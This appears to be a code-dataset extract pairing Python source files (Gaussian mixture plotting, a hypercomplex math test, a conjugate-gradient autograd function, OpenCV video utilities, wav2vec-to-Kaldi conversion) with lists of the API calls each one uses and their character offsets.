x_min = torch.min(x_scope[0])
x_max = torch.max(x_scope[1])
y_min = torch.min(y_scope[0])
y_max = torch.max(y_scope[1])
if x_min != torch.min(abs(x_scope[0])):
x_min = -torch.min(abs(x_scope[0]))
if x_max != torch.max(abs(x_scope[1])):
x_max = -torch.max(abs(x_scope[1]))
if y_min != torch.min(abs(y_scope[0])):
y_min = -torch.min(abs(y_scope[0]))
if y_max != torch.max(abs(y_scope[1])):
y_max = -torch.max(abs(y_scope[1]))
return [x_min, x_max], [y_min, y_max]
def cal_multiGauProbDistr(xx, yy, alp, mu, sigma):
xy = np.concatenate((xx.reshape(-1,1), yy.reshape(-1,1)), axis=1).astype(np.float32)
p = np.array([])
for i in range(xy.shape[0]):
p = np.append( p, cal_multiGauProb(alp, mu, sigma, x=ts(xy[i,:][np.newaxis,:])).detach().numpy() )
p[np.where(p<max(p)/10)] = 0
return p.reshape(xx.shape)
def draw_probDistribution(ax, alp, mu, sigma, main=3, nsigma=3, step=0.5, colorbar=False, toplot=True):
'''
Arguments:
ax - Axis
alp (BxG) - (alpha) Component's weight.
mu (BxGxC) - The means of the Gaussians.
sigma (BxGxC) - The standard deviation of the Gaussians.
'''
if main is not None:
alp, mu, sigma = take_mainCompo(alp, mu, sigma, main=main)
# ================= Register Colormap ================START
ncolors = 256
color_array = plt.get_cmap('gist_rainbow')(range(ncolors)) # get colormap
color_array[:,-1] = np.linspace(0,1,ncolors) # change alpha values
color_array[:,-1][:25] = 0
map_object = LinearSegmentedColormap.from_list(name='rainbow_alpha',colors=color_array) # create a colormap object
plt.register_cmap(cmap=map_object) # register this new colormap with matplotlib
# ================= Register Colormap ==================END
xlim, ylim = sigma_limit(mu, sigma, nsigma=nsigma)
x = np.arange(xlim[0].detach().numpy(), xlim[1].detach().numpy(), step=step)
y = np.arange(ylim[0].detach().numpy(), ylim[1].detach().numpy(), step=step)
xx, yy = np.meshgrid(x, y)
pp = cal_multiGauProbDistr(xx, yy, alp, mu, sigma)
if toplot:
cntr = ax.contourf(xx, yy, pp, cmap="rainbow_alpha")
if colorbar:
plt.colorbar(cntr, ax=ax)
return xx,yy,pp
def draw_GauEllipse(ax, mu, sigma, fc='b', nsigma=3, extend=False, label=None):
'''
mu (GxC) - The means of the Gaussians.
sigma (GxC) - The standard deviation of the Gaussians.
'''
for i in range(mu.shape[0]):
if i != 0:
label=None
if extend:
patch = patches.Ellipse(mu[i,:], nsigma*sigma[i,0]+8, nsigma*sigma[i,1]+8, fc=fc, label=label)
ax.add_patch(patch)
else:
patch = patches.Ellipse(mu[i,:], nsigma*sigma[i,0], nsigma*sigma[i,1], fc=fc, label=label)
ax.add_patch(patch)
|
[
"torch.distributions.Categorical",
"torch.max",
"torch.sqrt",
"torch.exp",
"torch.min",
"numpy.array",
"torch.sum",
"torch.mean",
"torch.prod",
"numpy.linspace",
"numpy.meshgrid",
"torch.sort",
"matplotlib.pyplot.register_cmap",
"matplotlib.patches.Ellipse",
"matplotlib.colors.LinearSegmentedColormap.from_list",
"matplotlib.pyplot.get_cmap",
"torch.nn.Softmax",
"matplotlib.pyplot.colorbar",
"torch.tensor",
"torch.nn.Linear",
"torch.nn.ELU"
] |
[((4004, 4027), 'torch.prod', 'torch.prod', (['prob'], {'dim': '(2)'}), '(prob, dim=2)\n', (4014, 4027), False, 'import torch\n'), ((4285, 4307), 'torch.sum', 'torch.sum', (['prob'], {'dim': '(1)'}), '(prob, dim=1)\n', (4294, 4307), False, 'import torch\n'), ((4691, 4706), 'torch.mean', 'torch.mean', (['nll'], {}), '(nll)\n', (4701, 4706), False, 'import torch\n'), ((5430, 5446), 'torch.distributions.Categorical', 'Categorical', (['alp'], {}), '(alp)\n', (5441, 5446), False, 'from torch.distributions import Categorical\n'), ((6123, 6138), 'torch.sort', 'torch.sort', (['alp'], {}), '(alp)\n', (6133, 6138), False, 'import torch\n'), ((7046, 7067), 'torch.min', 'torch.min', (['x_scope[0]'], {}), '(x_scope[0])\n', (7055, 7067), False, 'import torch\n'), ((7080, 7101), 'torch.max', 'torch.max', (['x_scope[1]'], {}), '(x_scope[1])\n', (7089, 7101), False, 'import torch\n'), ((7114, 7135), 'torch.min', 'torch.min', (['y_scope[0]'], {}), '(y_scope[0])\n', (7123, 7135), False, 'import torch\n'), ((7148, 7169), 'torch.max', 'torch.max', (['y_scope[1]'], {}), '(y_scope[1])\n', (7157, 7169), False, 'import torch\n'), ((7717, 7729), 'numpy.array', 'np.array', (['[]'], {}), '([])\n', (7725, 7729), True, 'import numpy as np\n'), ((8546, 8572), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', 'ncolors'], {}), '(0, 1, ncolors)\n', (8557, 8572), True, 'import numpy as np\n'), ((8641, 8716), 'matplotlib.colors.LinearSegmentedColormap.from_list', 'LinearSegmentedColormap.from_list', ([], {'name': '"""rainbow_alpha"""', 'colors': 'color_array'}), "(name='rainbow_alpha', colors=color_array)\n", (8674, 8716), False, 'from matplotlib.colors import LinearSegmentedColormap\n'), ((8747, 8781), 'matplotlib.pyplot.register_cmap', 'plt.register_cmap', ([], {'cmap': 'map_object'}), '(cmap=map_object)\n', (8764, 8781), True, 'import matplotlib.pyplot as plt\n'), ((9122, 9139), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {}), '(x, y)\n', (9133, 9139), True, 'import numpy as np\n'), ((1673, 1712), 'torch.nn.Linear', 'nn.Linear', (['dim_fea', '(dim_prob * num_gaus)'], {}), '(dim_fea, dim_prob * num_gaus)\n', (1682, 1712), True, 'import torch.nn as nn\n'), ((2395, 2403), 'torch.nn.ELU', 'nn.ELU', ([], {}), '()\n', (2401, 2403), True, 'import torch.nn as nn\n'), ((2927, 2966), 'torch.nn.Linear', 'nn.Linear', (['dim_fea', '(dim_prob * num_gaus)'], {}), '(dim_fea, dim_prob * num_gaus)\n', (2936, 2966), True, 'import torch.nn as nn\n'), ((5071, 5119), 'torch.tensor', 'ts', (['[[1 / sigma[i, 0], 0], [0, 1 / sigma[i, 1]]]'], {}), '([[1 / sigma[i, 0], 0], [0, 1 / sigma[i, 1]]])\n', (5073, 5119), True, 'import torch.tensor as ts\n'), ((5159, 5230), 'torch.sqrt', 'torch.sqrt', (['(S_inv[0, 0] * mu0[0, 0] ** 2 + S_inv[1, 1] * mu0[0, 1] ** 2)'], {}), '(S_inv[0, 0] * mu0[0, 0] ** 2 + S_inv[1, 1] * mu0[0, 1] ** 2)\n', (5169, 5230), False, 'import torch\n'), ((5255, 5261), 'torch.tensor', 'ts', (['md'], {}), '(md)\n', (5257, 5261), True, 'import torch.tensor as ts\n'), ((8462, 8490), 'matplotlib.pyplot.get_cmap', 'plt.get_cmap', (['"""gist_rainbow"""'], {}), "('gist_rainbow')\n", (8474, 8490), True, 'import matplotlib.pyplot as plt\n'), ((1550, 1578), 'torch.nn.Linear', 'nn.Linear', (['dim_fea', 'num_gaus'], {}), '(dim_fea, num_gaus)\n', (1559, 1578), True, 'import torch.nn as nn\n'), ((1592, 1609), 'torch.nn.Softmax', 'nn.Softmax', ([], {'dim': '(1)'}), '(dim=1)\n', (1602, 1609), True, 'import torch.nn as nn\n'), ((1765, 1804), 'torch.nn.Linear', 'nn.Linear', (['dim_fea', '(dim_prob * num_gaus)'], {}), '(dim_fea, dim_prob * num_gaus)\n', (1774, 1804), True, 'import torch.nn as nn\n'), ((2804, 2832), 'torch.nn.Linear', 'nn.Linear', (['dim_fea', 'num_gaus'], {}), '(dim_fea, num_gaus)\n', (2813, 2832), True, 'import torch.nn as nn\n'), ((2846, 2863), 'torch.nn.Softmax', 'nn.Softmax', ([], {'dim': '(1)'}), '(dim=1)\n', (2856, 2863), True, 'import torch.nn as nn\n'), ((3019, 3058), 'torch.nn.Linear', 'nn.Linear', (['dim_fea', '(dim_prob * num_gaus)'], {}), '(dim_fea, dim_prob * num_gaus)\n', (3028, 3058), True, 'import torch.nn as nn\n'), ((3947, 3986), 'torch.exp', 'torch.exp', (['(-((x - mu) / sigma) ** 2 / 2)'], {}), '(-((x - mu) / sigma) ** 2 / 2)\n', (3956, 3986), False, 'import torch\n'), ((9306, 9331), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (['cntr'], {'ax': 'ax'}), '(cntr, ax=ax)\n', (9318, 9331), True, 'import matplotlib.pyplot as plt\n'), ((9670, 9772), 'matplotlib.patches.Ellipse', 'patches.Ellipse', (['mu[i, :]', '(nsigma * sigma[i, 0] + 8)', '(nsigma * sigma[i, 1] + 8)'], {'fc': 'fc', 'label': 'label'}), '(mu[i, :], nsigma * sigma[i, 0] + 8, nsigma * sigma[i, 1] + \n 8, fc=fc, label=label)\n', (9685, 9772), True, 'import matplotlib.patches as patches\n'), ((9823, 9916), 'matplotlib.patches.Ellipse', 'patches.Ellipse', (['mu[i, :]', '(nsigma * sigma[i, 0])', '(nsigma * sigma[i, 1])'], {'fc': 'fc', 'label': 'label'}), '(mu[i, :], nsigma * sigma[i, 0], nsigma * sigma[i, 1], fc=fc,\n label=label)\n', (9838, 9916), True, 'import matplotlib.patches as patches\n'), ((3920, 3945), 'torch.tensor', 'torch.tensor', (['(2 * math.pi)'], {}), '(2 * math.pi)\n', (3932, 3945), False, 'import torch\n'), ((5267, 5273), 'torch.tensor', 'ts', (['md'], {}), '(md)\n', (5269, 5273), True, 'import torch.tensor as ts\n'), ((7824, 7851), 'torch.tensor', 'ts', (['xy[i, :][np.newaxis, :]'], {}), '(xy[i, :][np.newaxis, :])\n', (7826, 7851), True, 'import torch.tensor as ts\n')]
|
import numpy as np
import pytest
from opytimizer.math import hypercomplex
def test_norm():
array = np.array([[1, 1]])
norm_array = hypercomplex.norm(array)
assert norm_array > 0
def test_span():
array = np.array([[0.5, 0.75, 0.5, 0.9]])
lb = [0]
ub = [10]
span_array = hypercomplex.span(array, lb, ub)
assert span_array > 0
|
[
"numpy.array",
"opytimizer.math.hypercomplex.span",
"opytimizer.math.hypercomplex.norm"
] |
[((106, 124), 'numpy.array', 'np.array', (['[[1, 1]]'], {}), '([[1, 1]])\n', (114, 124), True, 'import numpy as np\n'), ((143, 167), 'opytimizer.math.hypercomplex.norm', 'hypercomplex.norm', (['array'], {}), '(array)\n', (160, 167), False, 'from opytimizer.math import hypercomplex\n'), ((226, 259), 'numpy.array', 'np.array', (['[[0.5, 0.75, 0.5, 0.9]]'], {}), '([[0.5, 0.75, 0.5, 0.9]])\n', (234, 259), True, 'import numpy as np\n'), ((307, 339), 'opytimizer.math.hypercomplex.span', 'hypercomplex.span', (['array', 'lb', 'ub'], {}), '(array, lb, ub)\n', (324, 339), False, 'from opytimizer.math import hypercomplex\n')]
|
import torch
from scipy.sparse.linalg import LinearOperator, cg
from typing import Callable, Optional
from torch import Tensor
import numpy as np
import time
class CG(torch.autograd.Function):
@staticmethod
def forward(ctx, z: Tensor, AcquisitionModel, beta: Tensor, y, G: Callable, GH: Callable, GHG: Optional[Callable]=None,x0:Optional[Tensor]=None) -> Tensor:
tmp = AcquisitionModel.adjoint(y)
if GHG is None:
GHG = lambda x: GH(G(x))
b = tmp.as_array().ravel() + (beta * GH(z)).numpy().ravel()
if x0 is not None:
x0 = x0.numpy().ravel()
def AHA(x):
tmp.fill(x)
return AcquisitionModel.adjoint(AcquisitionModel.direct(tmp)).as_array().ravel()
H = LinearOperator(
shape=(np.prod(b.shape), np.prod(b.shape)),
dtype=np.complex64,
matvec=lambda x: AHA(x)+(beta * GHG(torch.from_numpy(x).reshape(tmp.shape).unsqueeze(0))).numpy().ravel()
)
sol = cg(H, b,tol=1e-3,x0=x0)
xprime = sol[0].reshape(tmp.shape)
ctx.H = H
ctx.G = G
ctx.GH = GH
xprime_tensor = torch.from_numpy(xprime)
ctx.save_for_backward(beta, xprime_tensor, z)
return xprime_tensor
@staticmethod
def backward(ctx, grad_output):
beta, xprime, z = ctx.saved_tensors
b = grad_output.unsqueeze(0).numpy().ravel()
old=time.time()
grad = torch.from_numpy(cg(ctx.H, b,tol=1e-3, x0=b)[0]).reshape(grad_output.shape)
print('backward cg',time.time()-old)
gz = gbeta = None
if ctx.needs_input_grad[0]:
gz = beta * ctx.G(grad.unsqueeze(0))
if ctx.needs_input_grad[2]:
gbeta = (-ctx.GH(ctx.G(xprime.unsqueeze(0)) - z.unsqueeze(0)) * grad).sum().real
return gz, None, gbeta, None, None, None, None, None
|
[
"numpy.prod",
"scipy.sparse.linalg.cg",
"time.time",
"torch.from_numpy"
] |
[((1002, 1028), 'scipy.sparse.linalg.cg', 'cg', (['H', 'b'], {'tol': '(0.001)', 'x0': 'x0'}), '(H, b, tol=0.001, x0=x0)\n', (1004, 1028), False, 'from scipy.sparse.linalg import LinearOperator, cg\n'), ((1149, 1173), 'torch.from_numpy', 'torch.from_numpy', (['xprime'], {}), '(xprime)\n', (1165, 1173), False, 'import torch\n'), ((1421, 1432), 'time.time', 'time.time', ([], {}), '()\n', (1430, 1432), False, 'import time\n'), ((1552, 1563), 'time.time', 'time.time', ([], {}), '()\n', (1561, 1563), False, 'import time\n'), ((791, 807), 'numpy.prod', 'np.prod', (['b.shape'], {}), '(b.shape)\n', (798, 807), True, 'import numpy as np\n'), ((809, 825), 'numpy.prod', 'np.prod', (['b.shape'], {}), '(b.shape)\n', (816, 825), True, 'import numpy as np\n'), ((1465, 1494), 'scipy.sparse.linalg.cg', 'cg', (['ctx.H', 'b'], {'tol': '(0.001)', 'x0': 'b'}), '(ctx.H, b, tol=0.001, x0=b)\n', (1467, 1494), False, 'from scipy.sparse.linalg import LinearOperator, cg\n'), ((908, 927), 'torch.from_numpy', 'torch.from_numpy', (['x'], {}), '(x)\n', (924, 927), False, 'import torch\n')]
|
#! /usr/bin/env python
# Copyright (c) 2018 - 2019 <NAME> <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division
from __future__ import print_function
import os
import cv2
import numpy as np
from pythutils.fileutils import get_ext
from pythutils.mathutils import closenr, sort_points
def check_media(source, internal=False):
"""Runs some basic checks on a mediafile or stream"""
ext = get_ext(str(source))
ftype = None
if ext in [".mov",".mp4",".avi"]:
ftype = "vid"
if ext in [".jpg", ".png", ".jpeg", ".bmp"]:
ftype = "img"
if type(source) == int:
ftype = "stream"
if ftype == None:
print("File neither video or image file..")
return False
if ftype == "img" or ftype == "vid":
filedir = os.path.dirname(source)
if filedir != "":
if not os.path.isdir(filedir):
print("File directory does not exist..")
return False
if not os.path.isfile(source):
print("File does not exist..")
return False
if ftype == "vid" or ftype == "stream":
cap = cv2.VideoCapture(source)
flag, frame = cap.read()
if not flag:
print("Video source opened but failed to read images..")
return False
if not internal:
print("Mediafile okay.. ", end = "")
return True
def getimg(mediafile):
"""Acquires a numpy array from a video or image"""
try:
cap = cv2.VideoCapture(mediafile)
_, img = cap.read()
except:
img = cv2.imread(mediafile)
return img
def get_vid_params(mediafile):
"""Gets video parameters from file or video instance"""
if type(mediafile) is str:
if get_ext(mediafile) not in [".mov",".mp4",".avi"]:
raise TypeError("File not a video..")
mediafile = cv2.VideoCapture(mediafile)
if not mediafile.read()[0]:
raise RuntimeError("Video could not be read..")
fps = int(mediafile.get(cv2.CAP_PROP_FPS))
width = int(mediafile.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(mediafile.get(cv2.CAP_PROP_FRAME_HEIGHT))
fcount = int(mediafile.get(cv2.CAP_PROP_FRAME_COUNT))
return fps, width, height, fcount
def videowriter(filein, w, h, fps, resizeval = 1):
"""Creates a vidout instance using the opencv VideoWriter class"""
ext = get_ext(filein)
fileout = filein[:-len(ext)]+".mp4" if ext!="" else filein+".mp4"
viddims = (w, h) if resizeval == 1 else (int(w*resizeval), int(h*resizeval))
fourcc = cv2.VideoWriter_fourcc(*"mp4v")
vidout = cv2.VideoWriter(fileout, fourcc, fps, viddims)
return vidout
def safe_framecount(vidfile):
"""Saves video frame counter that counts frame-by-frame"""
cap = cv2.VideoCapture(vidfile)
vidlength = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
count = 0
while True:
ret, frame = cap.read()
if not ret:
break
count += 1
print("video had", vidlength-count, "non-existing frames.. ", end = "")
return count
def crop(image, pt1, pt2=None):
"""Crops image based on based on top left and bottom right corner"""
if pt2 == None:
pt2 = pt1[1]
pt1 = pt1[0]
cropped = image[pt1[1]:pt2[1], pt1[0]:pt2[0]]
return cropped
def fourpt_transform(image, pts):
"""
Perspective transform a section of an image based on four coordinates
to obtain a top-down view
"""
rect = sort_points(pts)
(tl, tr, br, bl) = rect
widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))
widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))
maxWidth = max(int(widthA), int(widthB))
heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))
heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))
maxHeight = max(int(heightA), int(heightB))
dst = np.array([[0, 0], [maxWidth - 1, 0],
[maxWidth - 1, maxHeight - 1],
[0, maxHeight - 1]], dtype = "float32")
M = cv2.getPerspectiveTransform(rect, dst)
warped = cv2.warpPerspective(image, M, (maxWidth, maxHeight))
return warped
def checkroi(roi, resolution):
"""Make sure roi coordinates are within resolution"""
x1 = max(roi[0][0],1)
y1 = max(roi[0][1],1)
x2 = min(roi[1][0],resolution[0])
y2 = min(roi[1][1],resolution[1])
return ((x1,y1),(x2,y2))
def zoom_to_roi(zoom, resolution):
"""Gets region of interest coordinates from x,y,w,h zoom parameters"""
x1 = int(zoom[0] * resolution[0])
x2 = int((zoom[0]+zoom[2]) * resolution[0])
y1 = int(zoom[1] * resolution[1])
y2 = int((zoom[1]+zoom[3]) * resolution[1])
return ((x1,y1),(x2,y2))
def roi_to_zoom(roi, resolution):
"""Gets x,y,w,h zoom parameters from region of interest coordinates"""
((x1,y1),(x2,y2)) = roi
z0 = round(x1 / resolution[0],2)
z1 = round(y1 / resolution[1],2)
z2 = round((x2-x1) / resolution[0],2)
z3 = round((y2-y1) / resolution[1],2)
return (z0, z1, z2, z3)
def picamconv(resolution, maxres = (1632, 1232)):
"""Adapts video resolution to work with raspberry pi camera"""
width = min(closenr(resolution[0],32), maxres[0])
height = min(closenr(resolution[1],16), maxres[1])
return (width, height)
def fix_vidshape(res1,res2):
"""Compares two resolutions and get missing x and y coords"""
xmin,ymin = 0,0
xmult = (res2[0]/res1[0])
ymult = (res2[1]/res1[1])
if xmult > ymult:
xmin = int((res2[0]-(res1[0]*ymult))/2)
if ymult > xmult:
ymin = int((res2[0]-(res1[0]*xmult))/2)
return xmin, ymin
def newdims(img = None, resize = 1, dims = None):
"""Returns new dimensions of an image array based on resize value"""
if dims is None:
if img is None:
print("No img or dims provided..")
return
else:
dims = (img.shape[1],img.shape[0])
width = int(dims[0] * resize)
height = int(dims[1] * resize)
return (width, height)
def imgresize(img, resize = 1, dims = None, back = False):
"""
Returns resized image based on resizevalue or provided dimensions
Parameters
----------
img : numpy array
resize : float, default = 1
Multiplier for image size
dims : tuple, default = None
Dimensions of the to-be returned image
back : bool, default = False
If the inverse of the resize value should be used
"""
if dims is None:
resize = 1/resize if back else resize
dims = newdims(img, resize)
interpol = cv2.INTER_CUBIC if resize > 1 else cv2.INTER_AREA
img = cv2.resize(img, dims, interpolation = interpol)
return img
def add_transimg(bgimg, transimg, offsets):
"""
Adds a semi-transparent (4-channel) image to a 3-channel background
image. Images need to be arrays.
"""
h, w, c = transimg.shape
fix = np.zeros((h, w, 3), np.uint8)
a = transimg[:, :, 3] / 255 #alpha
o = offsets
fix[:,:,0] = (1.-a)*bgimg[o[1]:o[1]+h, o[0]:o[0]+w, 0]+a*transimg[:,:,0]
fix[:,:,1] = (1.-a)*bgimg[o[1]:o[1]+h, o[0]:o[0]+w, 1]+a*transimg[:,:,1]
fix[:,:,2] = (1.-a)*bgimg[o[1]:o[1]+h, o[0]:o[0]+w, 2]+a*transimg[:,:,2]
bgimg[o[1]:o[1]+h, o[0]:o[0]+w] = fix
return bgimg
|
[
"pythutils.fileutils.get_ext",
"pythutils.mathutils.sort_points",
"numpy.sqrt",
"cv2.getPerspectiveTransform",
"cv2.VideoWriter",
"os.path.isfile",
"numpy.array",
"cv2.warpPerspective",
"numpy.zeros",
"os.path.dirname",
"cv2.VideoCapture",
"cv2.VideoWriter_fourcc",
"os.path.isdir",
"cv2.resize",
"pythutils.mathutils.closenr",
"cv2.imread"
] |
[((2904, 2919), 'pythutils.fileutils.get_ext', 'get_ext', (['filein'], {}), '(filein)\n', (2911, 2919), False, 'from pythutils.fileutils import get_ext\n'), ((3084, 3115), 'cv2.VideoWriter_fourcc', 'cv2.VideoWriter_fourcc', (["*'mp4v'"], {}), "(*'mp4v')\n", (3106, 3115), False, 'import cv2\n'), ((3129, 3175), 'cv2.VideoWriter', 'cv2.VideoWriter', (['fileout', 'fourcc', 'fps', 'viddims'], {}), '(fileout, fourcc, fps, viddims)\n', (3144, 3175), False, 'import cv2\n'), ((3302, 3327), 'cv2.VideoCapture', 'cv2.VideoCapture', (['vidfile'], {}), '(vidfile)\n', (3318, 3327), False, 'import cv2\n'), ((4008, 4024), 'pythutils.mathutils.sort_points', 'sort_points', (['pts'], {}), '(pts)\n', (4019, 4024), False, 'from pythutils.mathutils import closenr, sort_points\n'), ((4067, 4119), 'numpy.sqrt', 'np.sqrt', (['((br[0] - bl[0]) ** 2 + (br[1] - bl[1]) ** 2)'], {}), '((br[0] - bl[0]) ** 2 + (br[1] - bl[1]) ** 2)\n', (4074, 4119), True, 'import numpy as np\n'), ((4137, 4189), 'numpy.sqrt', 'np.sqrt', (['((tr[0] - tl[0]) ** 2 + (tr[1] - tl[1]) ** 2)'], {}), '((tr[0] - tl[0]) ** 2 + (tr[1] - tl[1]) ** 2)\n', (4144, 4189), True, 'import numpy as np\n'), ((4254, 4306), 'numpy.sqrt', 'np.sqrt', (['((tr[0] - br[0]) ** 2 + (tr[1] - br[1]) ** 2)'], {}), '((tr[0] - br[0]) ** 2 + (tr[1] - br[1]) ** 2)\n', (4261, 4306), True, 'import numpy as np\n'), ((4325, 4377), 'numpy.sqrt', 'np.sqrt', (['((tl[0] - bl[0]) ** 2 + (tl[1] - bl[1]) ** 2)'], {}), '((tl[0] - bl[0]) ** 2 + (tl[1] - bl[1]) ** 2)\n', (4332, 4377), True, 'import numpy as np\n'), ((4441, 4551), 'numpy.array', 'np.array', (['[[0, 0], [maxWidth - 1, 0], [maxWidth - 1, maxHeight - 1], [0, maxHeight - 1]]'], {'dtype': '"""float32"""'}), "([[0, 0], [maxWidth - 1, 0], [maxWidth - 1, maxHeight - 1], [0, \n maxHeight - 1]], dtype='float32')\n", (4449, 4551), True, 'import numpy as np\n'), ((4598, 4636), 'cv2.getPerspectiveTransform', 'cv2.getPerspectiveTransform', (['rect', 'dst'], {}), '(rect, dst)\n', (4625, 4636), False, 'import cv2\n'), ((4650, 4702), 'cv2.warpPerspective', 'cv2.warpPerspective', (['image', 'M', '(maxWidth, maxHeight)'], {}), '(image, M, (maxWidth, maxHeight))\n', (4669, 4702), False, 'import cv2\n'), ((7232, 7277), 'cv2.resize', 'cv2.resize', (['img', 'dims'], {'interpolation': 'interpol'}), '(img, dims, interpolation=interpol)\n', (7242, 7277), False, 'import cv2\n'), ((7508, 7537), 'numpy.zeros', 'np.zeros', (['(h, w, 3)', 'np.uint8'], {}), '((h, w, 3), np.uint8)\n', (7516, 7537), True, 'import numpy as np\n'), ((1307, 1330), 'os.path.dirname', 'os.path.dirname', (['source'], {}), '(source)\n', (1322, 1330), False, 'import os\n'), ((1652, 1676), 'cv2.VideoCapture', 'cv2.VideoCapture', (['source'], {}), '(source)\n', (1668, 1676), False, 'import cv2\n'), ((2014, 2041), 'cv2.VideoCapture', 'cv2.VideoCapture', (['mediafile'], {}), '(mediafile)\n', (2030, 2041), False, 'import cv2\n'), ((2391, 2418), 'cv2.VideoCapture', 'cv2.VideoCapture', (['mediafile'], {}), '(mediafile)\n', (2407, 2418), False, 'import cv2\n'), ((5754, 5780), 'pythutils.mathutils.closenr', 'closenr', (['resolution[0]', '(32)'], {}), '(resolution[0], 32)\n', (5761, 5780), False, 'from pythutils.mathutils import closenr, sort_points\n'), ((5809, 5835), 'pythutils.mathutils.closenr', 'closenr', (['resolution[1]', '(16)'], {}), '(resolution[1], 16)\n', (5816, 5835), False, 'from pythutils.mathutils import closenr, sort_points\n'), ((1501, 1523), 'os.path.isfile', 'os.path.isfile', (['source'], {}), '(source)\n', (1515, 1523), False, 'import os\n'), ((2096, 2117), 'cv2.imread', 'cv2.imread', (['mediafile'], {}), '(mediafile)\n', (2106, 2117), False, 'import cv2\n'), ((2271, 2289), 'pythutils.fileutils.get_ext', 'get_ext', (['mediafile'], {}), '(mediafile)\n', (2278, 2289), False, 'from pythutils.fileutils import get_ext\n'), ((1376, 1398), 'os.path.isdir', 'os.path.isdir', (['filedir'], {}), '(filedir)\n', (1389, 1398), False, 'import os\n')]
|
import kaldi_io
import numpy as np
import os
def get_parser():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("w2v_dir", help="wav2vec feature and text directory")
parser.add_argument("tar_root", help="output data directory in kaldi's format")
parser.add_argument("split", help="name of the subset")
parser.add_argument("--label", default="", help="if specified, copy labels too")
return parser
def main():
parser = get_parser()
args = parser.parse_args()
tar_dir = os.path.join(args.tar_root, args.split)
os.makedirs(tar_dir, exist_ok=True)
lengths_path = os.path.join(args.w2v_dir, f"{args.split}.lengths")
with open(lengths_path) as f:
lengths = [int(line.rstrip()) for line in f]
offsets = [0] + np.cumsum(lengths[:-1]).tolist()
feats = np.load(
os.path.join(args.w2v_dir, f"{args.split}.npy"),
mmap_mode="r"
)
assert feats.shape[0] == sum(lengths), \
f"lengths mismatch {feats.shape[0]} != {sum(lengths)}"
ark_path = os.path.join(tar_dir, "feats.ark")
scp_path = os.path.join(tar_dir, "feats.scp")
wspec = f"ark:| copy-feats --compress=true ark:- ark,scp:{ark_path},{scp_path}"
with kaldi_io.open_or_fd(wspec, "wb") as f:
for idx, (offset, length) in enumerate(zip(offsets, lengths)):
feat = feats[offset:offset+length]
kaldi_io.write_mat(f, feat, key=f"utt{idx:010d}")
u2s_path = os.path.join(tar_dir, "utt2spk")
s2u_path = os.path.join(tar_dir, "spk2utt")
with open(u2s_path, "w") as f_u2s, open(s2u_path, "w") as f_s2u:
for idx in range(len(lengths)):
f_u2s.write(f"utt{idx:010d} utt{idx:010d}\n")
f_s2u.write(f"utt{idx:010d} utt{idx:010d}\n")
if bool(args.label):
lab_path = os.path.join(args.w2v_dir, f"{args.split}.{args.label}")
txt_path = os.path.join(tar_dir, "text")
with open(lab_path) as f_lab, open(txt_path, "w") as f_txt:
for idx, line in enumerate(f_lab):
f_txt.write(f"utt{idx:010d} {line}")
if __name__ == "__main__":
main()
|
[
"os.makedirs",
"argparse.ArgumentParser",
"os.path.join",
"kaldi_io.open_or_fd",
"numpy.cumsum",
"kaldi_io.write_mat"
] |
[((105, 130), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (128, 130), False, 'import argparse\n'), ((552, 591), 'os.path.join', 'os.path.join', (['args.tar_root', 'args.split'], {}), '(args.tar_root, args.split)\n', (564, 591), False, 'import os\n'), ((597, 632), 'os.makedirs', 'os.makedirs', (['tar_dir'], {'exist_ok': '(True)'}), '(tar_dir, exist_ok=True)\n', (608, 632), False, 'import os\n'), ((655, 706), 'os.path.join', 'os.path.join', (['args.w2v_dir', 'f"""{args.split}.lengths"""'], {}), "(args.w2v_dir, f'{args.split}.lengths')\n", (667, 706), False, 'import os\n'), ((1092, 1126), 'os.path.join', 'os.path.join', (['tar_dir', '"""feats.ark"""'], {}), "(tar_dir, 'feats.ark')\n", (1104, 1126), False, 'import os\n'), ((1143, 1177), 'os.path.join', 'os.path.join', (['tar_dir', '"""feats.scp"""'], {}), "(tar_dir, 'feats.scp')\n", (1155, 1177), False, 'import os\n'), ((1513, 1545), 'os.path.join', 'os.path.join', (['tar_dir', '"""utt2spk"""'], {}), "(tar_dir, 'utt2spk')\n", (1525, 1545), False, 'import os\n'), ((1562, 1594), 'os.path.join', 'os.path.join', (['tar_dir', '"""spk2utt"""'], {}), "(tar_dir, 'spk2utt')\n", (1574, 1594), False, 'import os\n'), ((885, 932), 'os.path.join', 'os.path.join', (['args.w2v_dir', 'f"""{args.split}.npy"""'], {}), "(args.w2v_dir, f'{args.split}.npy')\n", (897, 932), False, 'import os\n'), ((1273, 1305), 'kaldi_io.open_or_fd', 'kaldi_io.open_or_fd', (['wspec', '"""wb"""'], {}), "(wspec, 'wb')\n", (1292, 1305), False, 'import kaldi_io\n'), ((1872, 1928), 'os.path.join', 'os.path.join', (['args.w2v_dir', 'f"""{args.split}.{args.label}"""'], {}), "(args.w2v_dir, f'{args.split}.{args.label}')\n", (1884, 1928), False, 'import os\n'), ((1949, 1978), 'os.path.join', 'os.path.join', (['tar_dir', '"""text"""'], {}), "(tar_dir, 'text')\n", (1961, 1978), False, 'import os\n'), ((1445, 1494), 'kaldi_io.write_mat', 'kaldi_io.write_mat', (['f', 'feat'], {'key': 'f"""utt{idx:010d}"""'}), "(f, feat, key=f'utt{idx:010d}')\n", (1463, 1494), False, 'import kaldi_io\n'), ((821, 844), 'numpy.cumsum', 'np.cumsum', (['lengths[:-1]'], {}), '(lengths[:-1])\n', (830, 